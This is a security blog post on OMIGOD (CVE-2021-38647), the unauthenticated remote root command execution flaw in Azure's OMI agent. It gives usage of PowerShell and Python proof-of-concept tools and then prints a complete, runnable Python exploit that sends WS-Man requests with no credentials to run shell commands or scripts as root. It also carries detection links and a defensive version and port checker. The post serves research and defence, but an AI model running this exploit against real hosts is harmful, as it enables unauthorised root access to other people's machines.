# OMIGOD - CVE-2021-38647

Hello All,

In this blog post we look at the unauthenticated remote code execution vulnerability discovered by the Wiz research team in the Open Management Infrastructure (OMI) agent deployed on Azure Linux VMs, which was assigned CVE-2021-38647. The blog post published by the Wiz team contains all the details required to exploit the vulnerability against a vulnerable instance.

While reading that post we decided to reproduce the scenario and write a quick PoC for the vulnerability. We are releasing Proof of Concept (PoC) code in both PowerShell and Python; the PoC code is published on the GitHub repo.

About Azure Open Management Infrastructure (OMI)

OMI is an open source CIM/WBEM server for UNIX/Linux, installed on Azure UNIX/Linux VMs, that lets users manage the machine and its configuration both locally and remotely. It is the Linux counterpart of Windows WMI and, like WMI, is built on the Common Information Model (CIM). The omiserver process runs with root privileges. OMI is installed automatically when services such as Azure Automation Accounts, Update Management, Log Analytics, Configuration Management, etc. are used with UNIX/Linux VMs. By default OMI only listens on a local UNIX socket; when the Configuration Management service is used to manage the machine remotely it also exposes a WS-Management (HTTPS) endpoint on port 5986. Microsoft's guidance also lists ports 5985 (HTTP) and 1270 as OMI listener ports, so all three are worth checking.

OMI functionality is extended through providers (listed here). To execute OS commands we will leverage the SCXcore provider, whose SCX_OperatingSystem class exposes the ExecuteShellCommand and ExecuteScript methods.

About OMIGOD Vulnerability

Anyone with network access to a vulnerable endpoint can send a WS-Man request that invokes the SCXcore provider without an Authorization header. On an unpatched omiserver the missing header does not cause the request to be rejected; the authentication step is skipped and the caller identity is left at its zero default, i.e. uid 0. The requested OS command therefore runs on the target machine with root privileges!

The vulnerability is now fixed, but it is always worth checking for it against Linux VMs in Azure.

Setup

Microsoft has started rolling out the patch to newly created instances and to existing ones. If we want a lab environment in Azure with a vulnerable instance, to test the exploit PoC or detections, we can leverage the ARM template created by Roberto Rodriguez. If we want an on-premises lab we can follow the blog published by rootsecdev.

Proof of Concept (PoC)

Both PoCs support the two SCX_OperatingSystem methods that execute code on the target machine:
1) ExecuteShellCommand - runs a single shell command
2) ExecuteScript - runs a whole script, passed base64-encoded

Let's look at the PowerShell PoC. Dot-source the script, then call the function with a single command:
. .\Invoke-CVE-2021-38647.ps1
Invoke-CVE-2021-38647 -TargetIP <IP> -TargetPort <PORT> -Command "<COMMAND>"

[Screenshot: Command Execution]

$MyScript = @"
id
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript))
$enc
Invoke-CVE-2021-38647 -TargetIP <IP> -TargetPort <PORT> -Script $enc

[Screenshot: Command Execution]

Now let's look at the Python PoC. A single command is passed with -c:

python .\CVE-2021-38647.py -t <IP> -p <PORT> -c "<COMMAND>"

[Screenshot: Command Execution]

For ExecuteScript the script is base64-encoded first (here in PowerShell, as above) and the encoded string is passed with -s:

$MyScript = @"
id
uname -a
"@
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($MyScript))
$enc
python .\CVE-2021-38647.py -t <IP> -p <PORT> -s $enc

[Screenshot: Command Execution]
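To show what the PoCs actually put on the wire for the vulnerability described above, here is an added, self-contained example in Python. It is not the code from the GitHub repo or from the Wiz post: it builds the WS-Man SOAP envelope for SCX_OperatingSystem.ExecuteShellCommand and ExecuteScript in the root/scx namespace, posts it with no Authorization header, and parses the StdOut/StdErr/ReturnCode fields of the reply. The parameter names (command, timeout, Script, Arguments, b64encoded) are taken from the SCX_OperatingSystem method signatures and should be verified against the provider's MOF; the target URL https://<IP>:5986/wsman, the sample response and the function names are assumptions made for this example.

```python
import base64
import ssl
import urllib.request
import uuid
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespaces used by the OMI WS-Man endpoint and the SCXcore provider class.
SOAP = "http://www.w3.org/2003/05/soap-envelope"
WSA = "http://schemas.xmlsoap.org/ws/2004/08/addressing"
WSMAN = "http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
SCX_OS = "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem"


def _invoke_envelope(target_url, method, params):
    """SOAP envelope invoking SCX_OperatingSystem.<method> in the root/scx namespace.
    The header deliberately carries no authentication material: on an unpatched
    omiserver the missing Authorization header leaves the caller at uid 0 (root)."""
    body = "".join(f"<p:{k}>{escape(v)}</p:{k}>" for k, v in params)
    return (
        f'<s:Envelope xmlns:s="{SOAP}" xmlns:a="{WSA}" xmlns:w="{WSMAN}">'
        "<s:Header>"
        f"<a:To>{escape(target_url)}</a:To>"
        f'<w:ResourceURI s:mustUnderstand="true">{SCX_OS}</w:ResourceURI>'
        f'<a:ReplyTo><a:Address s:mustUnderstand="true">{WSA}/role/anonymous</a:Address></a:ReplyTo>'
        f"<a:Action>{SCX_OS}/{method}</a:Action>"
        '<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>'
        f"<a:MessageID>uuid:{uuid.uuid4()}</a:MessageID>"
        "<w:OperationTimeout>PT1M30S</w:OperationTimeout>"
        '<w:SelectorSet><w:Selector Name="__cimnamespace">root/scx</w:Selector></w:SelectorSet>'
        "</s:Header>"
        f'<s:Body><p:{method}_INPUT xmlns:p="{SCX_OS}">{body}</p:{method}_INPUT></s:Body>'
        "</s:Envelope>"
    )


def execute_shell_command_envelope(target_url, command):
    # Parameter names follow the SCX_OperatingSystem.ExecuteShellCommand signature (assumption).
    return _invoke_envelope(target_url, "ExecuteShellCommand",
                            [("command", command), ("timeout", "0")])


def execute_script_envelope(target_url, script):
    # ExecuteScript takes the script body base64-encoded when b64encoded is true;
    # this mirrors the -Script / -s parameter of the PoCs.
    b64 = base64.b64encode(script.encode("utf-8")).decode("ascii")
    return _invoke_envelope(target_url, "ExecuteScript",
                            [("Script", b64), ("Arguments", ""),
                             ("timeout", "0"), ("b64encoded", "true")])


def send_envelope(target_url, envelope, timeout=30):
    """POST the envelope with NO Authorization header. omiserver presents a
    self-signed certificate, so verification is disabled for the lab target."""
    req = urllib.request.Request(
        target_url, data=envelope.encode("utf-8"), method="POST",
        headers={"Content-Type": "application/soap+xml;charset=UTF-8"})
    ctx = ssl._create_unverified_context()
    with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def parse_output(xml_text):
    """Pull ReturnValue/ReturnCode/StdOut/StdErr out of the *_OUTPUT element."""
    root = ET.fromstring(xml_text)

    def text_of(name):
        el = root.find(f".//{{{SCX_OS}}}{name}")
        return (el.text or "") if el is not None else None

    code = text_of("ReturnCode")
    return {
        "return_value": text_of("ReturnValue"),
        "return_code": int(code) if code not in (None, "") else None,
        "stdout": text_of("StdOut"),
        "stderr": text_of("StdErr"),
    }


# Constructed sample of what a vulnerable host returns for `id`; not captured traffic.
SAMPLE_RESPONSE = (
    f'<s:Envelope xmlns:s="{SOAP}" xmlns:a="{WSA}">'
    f"<s:Header><a:Action>{SCX_OS}/ExecuteShellCommandResponse</a:Action></s:Header>"
    f'<s:Body><p:ExecuteShellCommand_OUTPUT xmlns:p="{SCX_OS}">'
    "<p:ReturnValue>true</p:ReturnValue><p:ReturnCode>0</p:ReturnCode>"
    "<p:StdOut>uid=0(root) gid=0(root) groups=0(root)\n</p:StdOut><p:StdErr></p:StdErr>"
    "</p:ExecuteShellCommand_OUTPUT></s:Body></s:Envelope>"
)


if __name__ == "__main__":
    import sys
    # Usage: python omi_poc.py https://<IP>:5986/wsman "<COMMAND>"
    target, command = sys.argv[1], sys.argv[2]
    result = parse_output(send_envelope(target, execute_shell_command_envelope(target, command)))
    print(result["stdout"], end="")
    print(result["stderr"], end="", file=sys.stderr)
```

The only thing that distinguishes this request from a legitimate management call is the absent Authorization header, which is also what makes it easy to spot on the wire or in a proxy log: a POST to /wsman on port 5986 with no credentials that still receives an *_OUTPUT body.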

Detection & Mitigations

To detect exploitation attempts we can follow the hunting guidance published by the Microsoft Sentinel team:

https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093

To mitigate the vulnerability, update the OMI agent to version 1.6.8.1 (package version 1.6.8-1) or later; the installed version can be checked with /opt/omi/bin/omiserver -v, dpkg -l omi or rpm -q omi. Where remote management is not required, Microsoft also recommends restricting network access to the OMI ports 5985, 5986 and 1270.
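As an added example (not from the original post or from Microsoft's guidance), the two mitigation checks above can be turned into a small host assessment: parse the OMI version string and compare it with the fixed version, and parse `ss -lntp` output for OMI ports bound to a non-loopback address. The version output formats (1.6.8-1 or 1.6.8.1 somewhere in the line) and the `ss` column layout are assumptions; the sample inputs are constructed, not taken from a real host.

```python
import re

FIXED_VERSION = (1, 6, 8, 1)          # OMI 1.6.8-1 ships the fix for CVE-2021-38647
OMI_PORTS = {5985, 5986, 1270}        # HTTP, HTTPS and legacy OMI listener ports


def parse_omi_version(text):
    """Extract a 4-part OMI version from `omiserver -v`, `dpkg -l omi` or `rpm -q omi`
    output (assumed to contain something like 1.6.8-1 or 1.6.8.1). None if absent."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)[.-](\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable_version(text):
    """True if older than the fixed build, False if patched, None if unparseable."""
    v = parse_omi_version(text)
    return None if v is None else v < FIXED_VERSION


def exposed_omi_listeners(ss_output):
    """Ports from OMI_PORTS bound to a non-loopback address in `ss -lntp` output
    (assumed layout: State Recv-Q Send-Q Local:Port Peer:Port Process)."""
    exposed = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        host, _, port = fields[3].rpartition(":")   # handles 0.0.0.0:5986 and [::]:1270
        if not port.isdigit():
            continue
        loopback = host.startswith("127.") or host in ("[::1]", "::1")
        if int(port) in OMI_PORTS and not loopback:
            exposed.add(int(port))
    return exposed


def assess(version_text, ss_output):
    """Findings for one host; an empty list means patched and not network exposed."""
    findings = []
    vuln = is_vulnerable_version(version_text)
    if vuln is None:
        findings.append("could not determine OMI version")
    elif vuln:
        findings.append(f"OMI {'.'.join(map(str, parse_omi_version(version_text)))} "
                        f"is older than {'.'.join(map(str, FIXED_VERSION))}")
    for port in sorted(exposed_omi_listeners(ss_output)):
        findings.append(f"OMI port {port} listening on a non-loopback address")
    return findings


# Constructed sample outputs for a vulnerable, exposed host (not from a real machine).
SAMPLE_VERSION = "ii  omi  1.6.4.1  amd64  Open Management Infrastructure"
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    127.0.0.1:5985      0.0.0.0:*         users:(("omiserver",pid=1201,fd=6))
LISTEN 0      128    0.0.0.0:5986        0.0.0.0:*         users:(("omiserver",pid=1201,fd=7))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=803,fd=3))
LISTEN 0      128    [::]:1270           [::]:*            users:(("omiserver",pid=1201,fd=8))
"""

if __name__ == "__main__":
    for finding in assess(SAMPLE_VERSION, SAMPLE_SS) or ["no OMIGOD exposure found"]:
        print(finding)
```

Run against real hosts by feeding it the output of `dpkg -l omi` (or `rpm -q omi` / `/opt/omi/bin/omiserver -v`) and `ss -lntp`; a listener on 127.0.0.1 is reported as not exposed because the unauthenticated request still needs network reachability to the port.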

Reference

